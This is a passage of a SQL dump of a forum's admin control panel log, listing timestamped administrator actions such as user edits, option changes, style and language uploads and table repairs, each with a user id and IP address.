(589, 29, 1422123145, 'user.php', 'modify', '', '179.43.134.203'),
(590, 29, 1422123153, 'user.php', 'find', '', '179.43.134.203'),
(591, 29, 1422123153, 'user.php', 'edit', '', '179.43.134.203'),
(592, 29, 1422123167, 'user.php', 'edit', 'user id = 29', '179.43.134.203'),
(593, 29, 1422123187, 'user.php', 'update', 'user id = 29', '179.43.134.203'),
(594, 29, 1422123188, 'user.php', 'modify', 'user id = 29', '179.43.134.203'),
(595, 29, 1422123211, 'usertools.php', 'doips', '', '179.43.134.203'),
(596, 29, 1422123213, 'banning.php', 'modify', '', '179.43.134.203'),
(597, 29, 1422123213, 'banning.php', 'modify', '', '179.43.134.203'),
(598, 29, 1422123219, 'passwordcheck.php', '', '', '179.43.134.203'),
(599, 29, 1422123224, 'passwordcheck.php', 'check', '', '179.43.134.203'),
(600, 29, 1422123233, 'passwordcheck.php', 'check', '', '179.43.134.203'),
(601, 29, 1422123245, 'notice.php', 'modify', '', '179.43.134.203'),
(602, 29, 1422123247, 'announcement.php', 'modify', '', '179.43.134.203'),
(603, 29, 1422123247, 'announcement.php', 'modify', '', '179.43.134.203'),
(604, 29, 1422123250, 'forum.php', 'modify', '', '179.43.134.203'),
(605, 29, 1422123265, 'cronadmin.php', 'modify', '', '179.43.134.203'),
(606, 29, 1422123280, 'diagnostic.php', 'list', '', '179.43.134.203'),
(607, 29, 1422123281, 'misc.php', 'chooser', '', '179.43.134.203'),
(608, 29, 1422123285, 'backup.php', 'choose', '', '179.43.134.203'),
(609, 29, 1422123286, 'backup.php', 'choose', '', '179.43.134.203'),
(610, 29, 1422145262, 'plugin.php', 'product', '', '179.43.134.204'),
(611, 29, 1422145265, 'options.php', '', '', '179.43.134.204'),
(612, 29, 1422145269, 'options.php', 'options', '', '179.43.134.204'),
(613, 29, 1422145278, 'options.php', '', '', '179.43.134.204'),
(614, 29, 1422145290, 'options.php', 'options', '', '179.43.134.204'),
(615, 29, 1422145299, 'subscriptions.php', 'modify', '', '179.43.134.204'),
(616, 29, 1422145302, 'subscriptions.php', 'modify', '', '179.43.134.204'),
(617, 29, 1422238891, 'user.php', 'add', '', '93.228.144.155'),
(618, 29, 1422238916, 'user.php', 'update', '', '93.228.144.155'),
(619, 29, 1422238918, 'user.php', 'modify', 'user id = 158', '93.228.144.155'),
(620, 40, 1424956502, 'user.php', '', '', '85.105.178.242'),
(621, 40, 1424956541, 'user.php', 'find', '', '85.105.178.242'),
(622, 40, 1424956551, 'user.php', 'find', '', '85.105.178.242'),
(623, 40, 1424956553, 'user.php', 'find', '', '85.105.178.242'),
(624, 40, 1424956554, 'user.php', 'find', '', '85.105.178.242'),
(625, 40, 1424956590, 'user.php', 'find', '', '85.105.178.242'),
(626, 40, 1424956590, 'user.php', 'find', '', '85.105.178.242'),
(627, 40, 1424956591, 'user.php', 'find', '', '85.105.178.242'),
(628, 40, 1424956592, 'user.php', 'find', '', '85.105.178.242'),
(629, 40, 1424956593, 'user.php', 'find', '', '85.105.178.242'),
(630, 40, 1424956624, 'template.php', 'modify', '', '85.105.178.242'),
(631, 40, 1424956632, 'options.php', '', '', '85.105.178.242'),
(632, 40, 1424956647, 'notice.php', 'modify', '', '85.105.178.242'),
(633, 40, 1424956650, 'notice.php', 'modify', '', '85.105.178.242'),
(634, 40, 1424956653, 'announcement.php', 'modify', '', '85.105.178.242'),
(635, 40, 1424956663, 'forum.php', 'modify', '', '85.105.178.242'),
(636, 40, 1424956666, 'forum.php', 'edit', 'forum id = 19', '85.105.178.242'),
(637, 40, 1424956691, 'user.php', 'modify', '', '85.105.178.242'),
(638, 40, 1424956694, 'user.php', 'find', '', '85.105.178.242'),
(639, 40, 1424956698, 'user.php', 'edit', 'user id = 1', '85.105.178.242'),
(640, 40, 1424956744, 'user.php', 'update', 'user id = 1', '85.105.178.242'),
(641, 40, 1424956745, 'user.php', 'modify', 'user id = 1', '85.105.178.242'),
(642, 40, 1424956751, 'usergroup.php', 'modify', '', '85.105.178.242'),
(643, 40, 1424956760, 'usergroup.php', 'edit', 'usergroup id = 6', '85.105.178.242'),
(644, 40, 1424956777, 'user.php', 'find', '', '85.105.178.242'),
(645, 40, 1424956783, 'user.php', 'find', '', '85.105.178.242'),
(646, 40, 1424956868, 'options.php', '', '', '85.105.178.242'),
(647, 40, 1424956883, 'user.php', 'moderate', '', '85.105.178.242'),
(648, 1, 1424958365, 'options.php', '', '', '85.105.178.242'),
(649, 1, 1424958370, 'options.php', 'options', '', '85.105.178.242'),
(650, 1, 1424958395, 'options.php', 'dooptions', '', '85.105.178.242'),
(651, 1, 1424958397, 'options.php', 'options', '', '85.105.178.242'),
(652, 1, 1424958416, 'options.php', '', '', '85.105.178.242'),
(653, 1, 1424958423, 'options.php', 'options', '', '85.105.178.242'),
(654, 1, 1424958488, 'stats.php', 'index', '', '85.105.178.242'),
(655, 1, 1424958488, 'stats.php', 'index', '', '85.105.178.242'),
(656, 1, 1424958488, 'adminlog.php', 'choose', '', '85.105.178.242'),
(657, 1, 1424958488, 'adminlog.php', 'choose', '', '85.105.178.242'),
(658, 1, 1424958494, 'stats.php', 'index', '', '85.105.178.242'),
(659, 1, 1424958498, 'stats.php', 'top', '', '85.105.178.242'),
(660, 1, 1424958508, 'stats.php', 'reg', '', '85.105.178.242'),
(661, 1, 1424958512, 'adminlog.php', 'choose', '', '85.105.178.242'),
(662, 1, 1424958529, 'cronlog.php', 'choose', '', '85.105.178.242'),
(663, 1, 1424958530, 'modlog.php', 'choose', '', '85.105.178.242'),
(664, 1, 1424958549, 'plugin.php', 'product', '', '85.105.178.242'),
(665, 1, 1424958554, 'plugin.php', 'modify', '', '85.105.178.242'),
(666, 1, 1424958572, 'options.php', '', '', '85.105.178.242'),
(667, 1, 1424958574, 'options.php', 'options', '', '85.105.178.242'),
(668, 1, 1424958587, 'plugin.php', 'modify', '', '85.105.178.242'),
(669, 1, 1424958592, 'plugin.php', 'edit', 'plugin id = 2', '85.105.178.242'),
(670, 1, 1424958598, 'plugin.php', 'edit', 'plugin id = 4', '85.105.178.242'),
(671, 1, 1424958604, 'plugin.php', 'edit', 'plugin id = 5', '85.105.178.242'),
(672, 1, 1424958739, 'language.php', 'modify', '', '85.105.178.242'),
(673, 1, 1424958744, 'phrase.php', 'modify', '', '85.105.178.242'),
(674, 1, 1424958749, 'verify.php', '', '', '85.105.178.242'),
(675, 1, 1424958753, 'options.php', 'searchtype', '', '85.105.178.242'),
(676, 1, 1424958754, 'options.php', '', '', '85.105.178.242'),
(677, 1, 1424958948, 'user.php', 'modify', '', '85.105.178.242'),
(678, 1, 1424958948, 'user.php', 'modify', '', '85.105.178.242'),
(679, 1, 1424958951, 'user.php', 'find', '', '85.105.178.242'),
(680, 1, 1424958970, 'user.php', 'find', '', '85.105.178.242'),
(681, 1, 1424958979, 'user.php', 'find', '', '85.105.178.242'),
(682, 1, 1424958994, 'user.php', 'find', '', '85.105.178.242'),
(683, 1, 1424959027, 'user.php', 'find', '', '85.105.178.242'),
(684, 1, 1424959060, 'user.php', 'find', '', '85.105.178.242'),
(685, 1, 1424959062, 'user.php', 'find', '', '85.105.178.242'),
(686, 1, 1424959064, 'user.php', 'find', '', '85.105.178.242'),
(687, 1, 1424959069, 'user.php', 'edit', '', '85.105.178.242'),
(688, 1, 1424959258, 'user.php', 'find', '', '85.105.178.242'),
(689, 1, 1424959260, 'user.php', 'edit', 'user id = 1', '85.105.178.242'),
(690, 1, 1424959273, 'user.php', 'update', 'user id = 1', '85.105.178.242'),
(691, 1, 1424959274, 'user.php', 'modify', 'user id = 1', '85.105.178.242'),
(692, 40, 1425036913, 'template.php', 'modify', '', '85.105.178.242'),
(693, 40, 1425036921, 'css.php', 'edit', 'style id = 2', '85.105.178.242'),
(694, 40, 1425037016, 'css.php', 'update', 'style id = 2', '85.105.178.242'),
(695, 40, 1425037017, 'css.php', 'edit', 'style id = 2', '85.105.178.242'),
(696, 40, 1425037049, 'css.php', 'update', 'style id = 2', '85.105.178.242'),
(697, 40, 1425037051, 'css.php', 'edit', 'style id = 2', '85.105.178.242'),
(698, 40, 1425037089, 'css.php', 'update', 'style id = 2', '85.105.178.242'),
(699, 40, 1425037096, 'css.php', 'edit', 'style id = 2', '85.105.178.242'),
(700, 40, 1425037126, 'css.php', 'update', 'style id = 2', '85.105.178.242'),
(701, 40, 1425037130, 'css.php', 'edit', 'style id = 2', '85.105.178.242'),
(702, 40, 1425037824, 'css.php', 'update', 'style id = 2', '85.105.178.242'),
(703, 40, 1425037829, 'css.php', 'edit', 'style id = 2', '85.105.178.242'),
(704, 40, 1425037944, 'css.php', 'update', 'style id = 2', '85.105.178.242'),
(705, 40, 1425037950, 'css.php', 'edit', 'style id = 2', '85.105.178.242'),
(706, 40, 1425037963, 'css.php', 'update', 'style id = 2', '85.105.178.242'),
(707, 40, 1425037969, 'css.php', 'edit', 'style id = 2', '85.105.178.242'),
(708, 1, 1425138703, 'user.php', 'modify', '', '91.93.133.139'),
(709, 1, 1425138708, 'user.php', 'find', '', '91.93.133.139'),
(710, 1, 1425138708, 'user.php', 'edit', '', '91.93.133.139'),
(711, 1, 1425138714, 'user.php', 'find', '', '91.93.133.139'),
(712, 1, 1425138716, 'user.php', 'find', '', '91.93.133.139'),
(713, 1, 1425138718, 'user.php', 'find', '', '91.93.133.139'),
(714, 1, 1425138720, 'user.php', 'find', '', '91.93.133.139'),
(715, 1, 1425138724, 'user.php', 'edit', '', '91.93.133.139'),
(716, 1, 1425138732, 'help.php', 'answer', '', '91.93.133.139'),
(717, 1, 1425138761, 'user.php', 'edit', '', '91.93.133.139'),
(718, 1, 1425138826, 'user.php', 'update', '', '91.93.133.139'),
(719, 1, 1425138840, 'user.php', 'modify', '', '91.93.133.139'),
(720, 1, 1425138841, 'user.php', 'find', '', '91.93.133.139'),
(721, 1, 1425138843, 'user.php', 'find', '', '91.93.133.139'),
(722, 1, 1425138845, 'user.php', 'find', '', '91.93.133.139'),
(723, 1, 1425138848, 'user.php', 'find', '', '91.93.133.139'),
(724, 1, 1425138851, 'user.php', 'edit', '', '91.93.133.139'),
(725, 1, 1425138863, 'user.php', 'edit', '', '91.93.133.139'),
(726, 1, 1425138866, 'user.php', 'find', '', '91.93.133.139'),
(727, 1, 1425138969, 'user.php', 'add', '', '91.93.133.139'),
(728, 1, 1425138982, 'user.php', 'update', '', '91.93.133.139'),
(729, 1, 1425138984, 'user.php', 'edit', 'user id = 100', '91.93.133.139'),
(730, 1, 1425138994, 'user.php', 'update', 'user id = 100', '91.93.133.139'),
(731, 1, 1425138995, 'user.php', 'modify', 'user id = 100', '91.93.133.139'),
(732, 1, 1425304392, 'user.php', 'modify', '', '85.105.178.242'),
(733, 1, 1425304394, 'user.php', 'find', '', '85.105.178.242'),
(734, 1, 1425304396, 'user.php', 'find', '', '85.105.178.242'),
(735, 1, 1425304399, 'user.php', 'find', '', '85.105.178.242'),
(736, 1, 1425304401, 'user.php', 'edit', '', '85.105.178.242'),
(737, 1, 1425304411, 'user.php', 'edit', '', '85.105.178.242'),
(738, 1, 1425304441, 'user.php', 'update', '', '85.105.178.242'),
(739, 1, 1425304443, 'user.php', 'edit', 'user id = 46', '85.105.178.242'),
(740, 1, 1425304449, 'user.php', 'update', 'user id = 46', '85.105.178.242'),
(741, 1, 1425304450, 'user.php', 'modify', 'user id = 46', '85.105.178.242'),
(742, 1, 1425392893, 'options.php', '', '', '85.105.178.242'),
(743, 1, 1425392897, 'options.php', 'options', '', '85.105.178.242'),
(744, 1, 1425392980, 'options.php', 'dooptions', '', '85.105.178.242'),
(745, 1, 1425392982, 'options.php', 'options', '', '85.105.178.242'),
(746, 40, 1425393023, 'user.php', 'modify', '', '85.105.178.242'),
(747, 40, 1425393024, 'user.php', 'find', '', '85.105.178.242'),
(748, 40, 1425393028, 'user.php', 'find', '', '85.105.178.242'),
(749, 40, 1425393030, 'user.php', 'find', '', '85.105.178.242'),
(750, 40, 1425393033, 'user.php', 'edit', '', '85.105.178.242'),
(751, 40, 1425393043, 'user.php', 'update', '', '85.105.178.242'),
(752, 40, 1425393044, 'user.php', 'edit', 'user id = 40', '85.105.178.242'),
(753, 40, 1425393076, 'user.php', 'update', 'user id = 40', '85.105.178.242'),
(754, 40, 1425393077, 'user.php', 'modify', 'user id = 40', '85.105.178.242'),
(755, 40, 1425393434, 'notice.php', 'modify', '', '85.105.178.242'),
(756, 40, 1425393438, 'options.php', '', '', '85.105.178.242'),
(757, 40, 1425393441, 'options.php', 'options', '', '85.105.178.242'),
(758, 40, 1425393462, 'options.php', 'options', '', '85.105.178.242'),
(759, 40, 1425393469, 'options.php', 'options', '', '85.105.178.242'),
(760, 40, 1425393476, 'options.php', 'options', '', '85.105.178.242'),
(761, 40, 1425393489, 'options.php', 'options', '', '85.105.178.242'),
(762, 40, 1425393515, 'options.php', 'options', '', '85.105.178.242'),
(763, 40, 1425393527, 'email.php', 'start', '', '85.105.178.242'),
(764, 40, 1425393568, 'email.php', 'dosendmail', '', '85.105.178.242'),
(765, 40, 1425393576, 'help.php', 'answer', '', '85.105.178.242'),
(766, 40, 1425393597, 'email.php', 'dosendmail', '', '85.105.178.242'),
(767, 40, 1425393600, 'email.php', 'dosendmail', '', '85.105.178.242'),
(768, 40, 1425393933, 'user.php', 'modify', '', '85.105.178.242'),
(769, 40, 1425393934, 'user.php', 'find', '', '85.105.178.242'),
(770, 40, 1425393936, 'user.php', 'find', '', '85.105.178.242'),
(771, 40, 1425393937, 'user.php', 'find', '', '85.105.178.242'),
(772, 40, 1425393941, 'user.php', 'edit', '', '85.105.178.242'),
(773, 40, 1425393948, 'user.php', 'edit', 'user id = 40', '85.105.178.242'),
(774, 40, 1425393970, 'user.php', 'update', 'user id = 40', '85.105.178.242'),
(775, 40, 1425393971, 'user.php', 'modify', 'user id = 40', '85.105.178.242'),
(776, 40, 1425394305, 'user.php', 'modify', 'user id = 40', '85.105.178.242'),
(777, 40, 1425394307, 'user.php', 'find', '', '85.105.178.242'),
(778, 40, 1425394310, 'options.php', '', '', '85.105.178.242'),
(779, 40, 1425394313, 'options.php', 'options', '', '85.105.178.242'),
(780, 40, 1425394343, 'options.php', 'options', '', '85.105.178.242'),
(781, 40, 1425394378, 'options.php', 'options', '', '85.105.178.242'),
(782, 40, 1425394415, 'options.php', 'dooptions', '', '85.105.178.242'),
(783, 40, 1425394416, 'options.php', 'options', '', '85.105.178.242'),
(784, 40, 1425400673, 'template.php', 'findupdates', '', '85.105.178.242'),
(785, 40, 1425400688, 'user.php', 'modify', '', '85.105.178.242'),
(786, 40, 1425400690, 'user.php', 'find', '', '85.105.178.242'),
(787, 40, 1425400691, 'user.php', 'edit', 'user id = 119', '85.105.178.242'),
(788, 40, 1425400699, 'user.php', 'edit', 'user id = 40', '85.105.178.242'),
(789, 40, 1425400704, 'user.php', 'update', 'user id = 40', '85.105.178.242'),
(790, 40, 1425400705, 'user.php', 'modify', 'user id = 40', '85.105.178.242'),
(791, 13, 1425686914, 'user.php', 'doips', '', '199.217.118.201'),
(792, 13, 1425686918, 'moderate.php', 'posts', '', '199.217.118.201'),
(793, 13, 1425686919, 'forum.php', 'modify', '', '199.217.118.201'),
(794, 13, 1425686921, 'announcement.php', 'add', '', '199.217.118.201'),
(795, 40, 1427110488, 'user.php', 'add', '', '85.105.178.242'),
(796, 40, 1427110510, 'user.php', 'modify', '', '85.105.178.242'),
(797, 40, 1427110511, 'user.php', 'find', '', '85.105.178.242'),
(798, 40, 1427110516, 'user.php', 'find', '', '85.105.178.242'),
(799, 40, 1427110518, 'user.php', 'find', '', '85.105.178.242'),
(800, 40, 1427110520, 'user.php', 'find', '', '85.105.178.242'),
(801, 40, 1427110521, 'user.php', 'find', '', '85.105.178.242'),
(802, 40, 1427110542, 'user.php', 'add', '', '85.105.178.242'),
(803, 40, 1427110616, 'user.php', 'update', '', '85.105.178.242'),
(804, 40, 1427110617, 'user.php', 'modify', 'user id = 159', '85.105.178.242'),
(805, 40, 1427110639, 'user.php', 'find', '', '85.105.178.242'),
(806, 40, 1427110640, 'user.php', 'find', '', '85.105.178.242'),
(807, 40, 1427113234, 'user.php', 'add', '', '85.105.178.242'),
(808, 40, 1427117699, 'user.php', 'add', '', '85.105.178.242'),
(809, 40, 1427117735, 'user.php', 'update', '', '85.105.178.242'),
(810, 40, 1427117740, 'user.php', 'modify', 'user id = 160', '85.105.178.242'),
(811, 40, 1427289543, 'user.php', 'modify', '', '195.154.136.153'),
(812, 40, 1427289544, 'user.php', 'find', '', '195.154.136.153'),
(813, 40, 1427289545, 'user.php', 'find', '', '195.154.136.153'),
(814, 40, 1427289547, 'user.php', 'find', '', '195.154.136.153'),
(815, 40, 1427289550, 'user.php', 'find', '', '195.154.136.153'),
(816, 40, 1427289553, 'user.php', 'edit', '', '195.154.136.153'),
(817, 40, 1427289570, 'user.php', 'update', '', '195.154.136.153'),
(818, 40, 1427289572, 'user.php', 'edit', 'user id = 100', '195.154.136.153'),
(819, 40, 1427289581, 'user.php', 'update', 'user id = 100', '195.154.136.153'),
(820, 40, 1427289582, 'user.php', 'modify', 'user id = 100', '195.154.136.153'),
(821, 40, 1427293029, 'user.php', 'modify', '', '195.154.136.153'),
(822, 40, 1427293030, 'user.php', 'find', '', '195.154.136.153'),
(823, 40, 1427293032, 'user.php', 'find', '', '195.154.136.153'),
(824, 40, 1427293034, 'user.php', 'find', '', '195.154.136.153'),
(825, 40, 1427293035, 'user.php', 'find', '', '195.154.136.153'),
(826, 40, 1427293037, 'user.php', 'edit', '', '195.154.136.153'),
(827, 40, 1427293063, 'user.php', 'update', '', '195.154.136.153'),
(828, 40, 1427293064, 'user.php', 'edit', 'user id = 29', '195.154.136.153'),
(829, 40, 1427293118, 'user.php', 'update', 'user id = 29', '195.154.136.153'),
(830, 40, 1427293119, 'user.php', 'modify', 'user id = 29', '195.154.136.153'),
(831, 40, 1427293204, 'usertools.php', 'merge', '', '195.154.136.153'),
(832, 40, 1427293204, 'user.php', 'modify', '', '195.154.136.153'),
(833, 40, 1427293206, 'user.php', 'modify', '', '195.154.136.153'),
(834, 40, 1427293210, 'user.php', 'find', '', '195.154.136.153'),
(835, 40, 1427293212, 'user.php', 'find', '', '195.154.136.153'),
(836, 40, 1427293212, 'user.php', 'find', '', '195.154.136.153'),
(837, 40, 1427293214, 'user.php', 'find', '', '195.154.136.153'),
(838, 40, 1427293216, 'user.php', 'find', '', '195.154.136.153'),
(839, 40, 1427293219, 'user.php', 'edit', '', '195.154.136.153'),
(840, 40, 1427293225, 'user.php', 'update', '', '195.154.136.153'),
(841, 40, 1427293226, 'user.php', 'edit', 'user id = 40', '195.154.136.153'),
(842, 40, 1427293239, 'user.php', 'update', 'user id = 40', '195.154.136.153'),
(843, 40, 1427293240, 'user.php', 'modify', 'user id = 40', '195.154.136.153'),
(844, 40, 1427364387, 'options.php', '', '', '141.101.105.144'),
(845, 40, 1427364391, 'options.php', 'options', '', '141.101.105.144'),
(846, 40, 1427364419, 'options.php', 'options', '', '141.101.105.144'),
(847, 40, 1427364458, 'options.php', 'dooptions', '', '141.101.105.144'),
(848, 40, 1427364459, 'options.php', 'options', '', '141.101.105.144'),
(849, 40, 1427364719, 'options.php', '', '', '141.101.105.144'),
(850, 40, 1427364722, 'options.php', 'options', '', '141.101.105.144'),
(851, 40, 1427364733, 'options.php', 'dooptions', '', '141.101.105.144'),
(852, 40, 1427364734, 'options.php', 'options', '', '141.101.105.144'),
(853, 40, 1427364739, 'options.php', 'dooptions', '', '141.101.105.144'),
(854, 40, 1427364740, 'options.php', 'options', '', '141.101.105.144'),
(855, 40, 1427364863, 'options.php', 'dooptions', '', '141.101.105.144'),
(856, 40, 1427364864, 'options.php', 'options', '', '141.101.105.144'),
(857, 40, 1427364950, 'options.php', 'dooptions', '', '141.101.105.144'),
(858, 40, 1427364951, 'options.php', 'options', '', '141.101.105.144'),
(859, 40, 1427366593, 'options.php', 'dooptions', '', '141.101.105.144'),
(860, 40, 1427366594, 'options.php', 'options', '', '141.101.105.144'),
(861, 40, 1427367962, 'user.php', 'modify', '', '141.101.105.144'),
(862, 40, 1427367964, 'user.php', 'find', '', '141.101.105.144'),
(863, 40, 1427367966, 'user.php', 'find', '', '141.101.105.144'),
(864, 40, 1427367968, 'user.php', 'find', '', '141.101.105.144'),
(865, 40, 1427367970, 'user.php', 'edit', 'user id = 159', '141.101.105.144'),
(866, 40, 1427368003, 'user.php', 'update', 'user id = 159', '141.101.105.144'),
(867, 40, 1427368004, 'user.php', 'modify', 'user id = 159', '141.101.105.144'),
(868, 40, 1427370930, 'options.php', '', '', '141.101.105.144'),
(869, 40, 1427370932, 'options.php', 'options', '', '141.101.105.144'),
(870, 40, 1427370939, 'options.php', 'dooptions', '', '141.101.105.144'),
(871, 40, 1427370941, 'options.php', 'options', '', '141.101.105.144'),
(872, 40, 1427370987, 'email.php', 'start', '', '141.101.105.144'),
(873, 40, 1427371021, 'email.php', 'dosendmail', '', '141.101.105.144'),
(874, 40, 1427371021, 'email.php', 'dosendmail', '', '141.101.105.144'),
(875, 40, 1427371022, 'email.php', '', '', '141.101.105.144'),
(876, 40, 1427371052, 'user.php', 'add', '', '141.101.105.144'),
(877, 40, 1427371052, 'user.php', 'modify', '', '141.101.105.144'),
(878, 40, 1427371054, 'user.php', 'find', '', '141.101.105.144'),
(879, 40, 1427371057, 'user.php', 'find', '', '141.101.105.144'),
(880, 40, 1427371067, 'user.php', 'add', '', '141.101.105.144'),
(881, 40, 1427371074, 'user.php', 'modify', '', '141.101.105.144'),
(882, 40, 1427371075, 'user.php', 'find', '', '141.101.105.144'),
(883, 40, 1427371077, 'user.php', 'find', '', '141.101.105.144'),
(884, 40, 1427371078, 'user.php', 'find', '', '141.101.105.144'),
(885, 40, 1427371081, 'user.php', 'edit', '', '141.101.105.144'),
(886, 40, 1427371085, 'user.php', 'update', '', '141.101.105.144'),
(887, 40, 1427371087, 'user.php', 'edit', 'user id = 40', '141.101.105.144'),
(888, 40, 1427371109, 'user.php', 'update', 'user id = 40', '141.101.105.144'),
(889, 40, 1427371110, 'user.php', 'modify', 'user id = 40', '141.101.105.144'),
(890, 40, 1427371183, 'user.php', 'find', '', '141.101.105.144'),
(891, 40, 1427371185, 'user.php', 'find', '', '141.101.105.144'),
(892, 40, 1427371186, 'user.php', 'find', '', '141.101.105.144'),
(893, 40, 1427371188, 'user.php', 'edit', '', '141.101.105.144'),
(894, 40, 1427371191, 'user.php', 'update', '', '141.101.105.144'),
(895, 40, 1427371194, 'user.php', 'edit', 'user id = 40', '141.101.105.144'),
(896, 40, 1427371206, 'user.php', 'update', 'user id = 40', '141.101.105.144'),
(897, 40, 1427371207, 'user.php', 'modify', 'user id = 40', '141.101.105.144'),
(898, 40, 1427456764, 'user.php', 'modify', '', '141.101.105.144'),
(899, 40, 1427456767, 'user.php', 'find', '', '141.101.105.144'),
(900, 40, 1427456772, 'user.php', 'find', '', '141.101.105.144'),
(901, 40, 1427456774, 'user.php', 'find', '', '141.101.105.144'),
(902, 40, 1427456820, 'user.php', 'add', '', '141.101.105.144'),
(903, 40, 1427456854, 'user.php', 'update', '', '141.101.105.144'),
(904, 40, 1427456855, 'user.php', 'modify', 'user id = 161', '141.101.105.144'),
(905, 29, 1427544021, 'template.php', 'modify', '', '173.245.53.97'),
(906, 29, 1427544029, 'backup.php', 'choose', '', '173.245.53.97'),
(907, 29, 1427544032, 'repair.php', 'list', '', '173.245.53.97'),
(908, 29, 1427544036, 'repair.php', 'dorepair', '', '173.245.53.97'),
(909, 29, 1427544058, 'repair.php', 'dorepair', '', '173.245.53.97'),
(910, 29, 1427544061, 'repair.php', 'list', '', '173.245.53.97'),
(911, 29, 1427544068, 'repair.php', 'dorepair', '', '173.245.53.97'),
(912, 29, 1427544078, 'repair.php', 'list', '', '173.245.53.97'),
(913, 29, 1427544087, 'repair.php', 'dorepair', '', '173.245.53.97'),
(914, 29, 1427544102, 'repair.php', 'dorepair', '', '173.245.53.97'),
(915, 29, 1427544104, 'repair.php', 'list', '', '173.245.53.97'),
(916, 29, 1427587619, 'plugin.php', 'product', '', '173.245.53.97'),
(917, 29, 1427587700, 'plugin.php', 'productadd', '', '173.245.53.97'),
(918, 29, 1427587710, 'plugin.php', 'productimport', '', '173.245.53.97'),
(919, 29, 1427587712, 'plugin.php', 'product', '', '173.245.53.97'),
(920, 29, 1427587727, 'plugin.php', 'productdelete', '', '173.245.53.97'),
(921, 29, 1427587728, 'plugin.php', 'product', '', '173.245.53.97'),
(922, 29, 1427587732, 'options.php', '', '', '173.245.53.97'),
(923, 29, 1427587738, 'options.php', 'options', '', '173.245.53.97'),
(924, 29, 1427587752, 'options.php', 'dooptions', '', '173.245.53.97'),
(925, 29, 1427587754, 'options.php', 'options', '', '173.245.53.97'),
(926, 29, 1427587762, 'options.php', 'dooptions', '', '173.245.53.97'),
(927, 29, 1427587765, 'options.php', 'options', '', '173.245.53.97'),
(928, 29, 1427587778, 'plugin.php', 'productdelete', '', '173.245.53.97'),
(929, 29, 1427587779, 'plugin.php', 'productkill', '', '173.245.53.97'),
(930, 29, 1427587782, 'plugin.php', 'product', '', '173.245.53.97'),
(931, 29, 1427587822, 'template.php', 'files', '', '173.245.53.97'),
(932, 29, 1427587851, 'template.php', 'upload', '', '173.245.53.97'),
(933, 29, 1427587851, 'template.php', 'rebuild', '', '173.245.53.97'),
(934, 29, 1427587852, 'template.php', '', '', '173.245.53.97'),
(935, 29, 1427587874, 'template.php', 'deletestyle', 'style id = 3', '173.245.53.97'),
(936, 29, 1427587876, 'template.php', 'killstyle', 'style id = 3', '173.245.53.97'),
(937, 29, 1427587878, 'template.php', 'modify', '', '173.245.53.97'),
(938, 29, 1427587897, 'repair.php', 'list', '', '173.245.53.97'),
(939, 29, 1427587898, 'misc.php', 'chooser', '', '173.245.53.97'),
(940, 29, 1427587898, 'misc.php', 'chooser', '', '173.245.53.97'),
(941, 29, 1427587899, 'diagnostic.php', 'list', '', '173.245.53.97'),
(942, 29, 1427587902, 'diagnostic.php', 'doversion', '', '173.245.53.97'),
(943, 29, 1427587908, 'queries.php', 'modify', '', '173.245.53.97'),
(944, 29, 1427587938, 'stats.php', 'index', '', '173.245.53.97'),
(945, 29, 1427587941, 'stats.php', 'top', '', '173.245.53.97'),
(946, 29, 1427587945, 'stats.php', 'post', '', '173.245.53.97'),
(947, 29, 1427588011, 'language.php', 'modify', '', '173.245.53.97'),
(948, 29, 1427588013, 'language.php', 'add', '', '173.245.53.97'),
(949, 29, 1427588015, 'language.php', 'modify', '', '173.245.53.97'),
(950, 29, 1427588016, 'language.php', 'files', '', '173.245.53.97'),
(951, 29, 1427588030, 'language.php', 'upload', '', '173.245.53.97'),
(952, 29, 1427588031, 'language.php', 'rebuild', '', '173.245.53.97'),
(953, 29, 1427588059, 'language.php', '', '', '173.245.53.97'),
(954, 29, 1427588064, 'language.php', 'edit', 'Language ID = 3', '173.245.53.97'),
(955, 29, 1427588076, 'language.php', '', '', '173.245.53.97'),
(956, 29, 1427588082, 'language.php', 'delete', 'Language ID = 3', '173.245.53.97'),
(957, 29, 1427588083, 'language.php', 'kill', 'Language ID = 3', '173.245.53.97'),
(958, 29, 1427588085, 'language.php', '', '', '173.245.53.97'),
(959, 29, 1427647151, 'template.php', 'findupdates', '', '173.245.53.97'),
(960, 29, 1427647161, 'notice.php', 'modify', '', '173.245.53.97'),
(961, 29, 1427647163, 'announcement.php', 'modify', '', '173.245.53.97'),
(962, 29, 1427647173, 'subscriptions.php', 'modify', '', '173.245.53.97'),
(963, 29, 1427647179, 'image.php', 'modify', 'Post Icons', '173.245.53.97'),
(964, 100, 1427706464, 'stats.php', 'index', '', '141.101.92.197'),
(965, 100, 1427706467, 'stats.php', 'top', '', '141.101.92.197'),
(966, 100, 1427706469, 'stats.php', 'activity', '', '141.101.92.197'),
(967, 100, 1427706471, 'stats.php', 'activity', '', '141.101.92.197'),
(968, 100, 1427706479, 'moderate.php', 'attachments', '', '141.101.92.197'),
(969, 100, 1427706480, 'moderate.php', 'events', '', '141.101.92.197'),
(970, 100, 1427706482, 'moderate.php', 'messages', '', '141.101.92.197'),
(971, 40, 1427822026, 'user.php', 'modify', '', '141.101.105.144'),
(972, 40, 1427822028, 'user.php', 'find', '', '141.101.105.144'),
(973, 40, 1427822031, 'user.php', 'find', '', '141.101.105.144'),
(974, 40, 1427822033, 'user.php', 'find', '', '141.101.105.144'),
(975, 40, 1427822040, 'user.php', 'add', '', '141.101.105.144'),
(976, 40, 1427822086, 'user.php', 'update', '', '141.101.105.144'),
(977, 40, 1427822087, 'user.php', 'modify', 'user id = 162', '141.101.105.144'),
(978, 40, 1427883822, 'options.php', '', '', '141.101.105.144'),
(979, 40, 1427883830, 'options.php', 'options', '', '141.101.105.144'),
(980, 40, 1427883903, 'options.php', 'options', '', '141.101.105.144'),
(981, 40, 1427883927, 'language.php', 'modify', '', '141.101.105.144'),
(982, 40, 1427883930, 'language.php', 'edit', 'Language ID = 1', '141.101.105.144'),
(983, 40, 1427883941, 'language.php', 'modify', '', '141.101.105.144'),
(984, 40, 1427883947, 'phrase.php', 'modify', '', '141.101.105.144'),
(985, 40, 1427883952, 'phrase.php', 'search', '', '141.101.105.144'),
(986, 40, 1427884186, 'verify.php', '', '', '141.101.105.144'),
(987, 40, 1427884190, 'options.php', '', '', '141.101.105.144'),
(988, 40, 1427884195, 'options.php', 'options', '', '141.101.105.144'),
(989, 40, 1427884212, 'options.php', 'options', '', '141.101.105.144'),
(990, 40, 1427884228, 'options.php', 'options', '', '141.101.105.144'),
(991, 100, 1428100781, 'user.php', 'viewuser', 'user id = 100', '141.101.92.124'),
(992, 100, 1428100787, 'moderate.php', 'attachments', '', '141.101.92.124'),
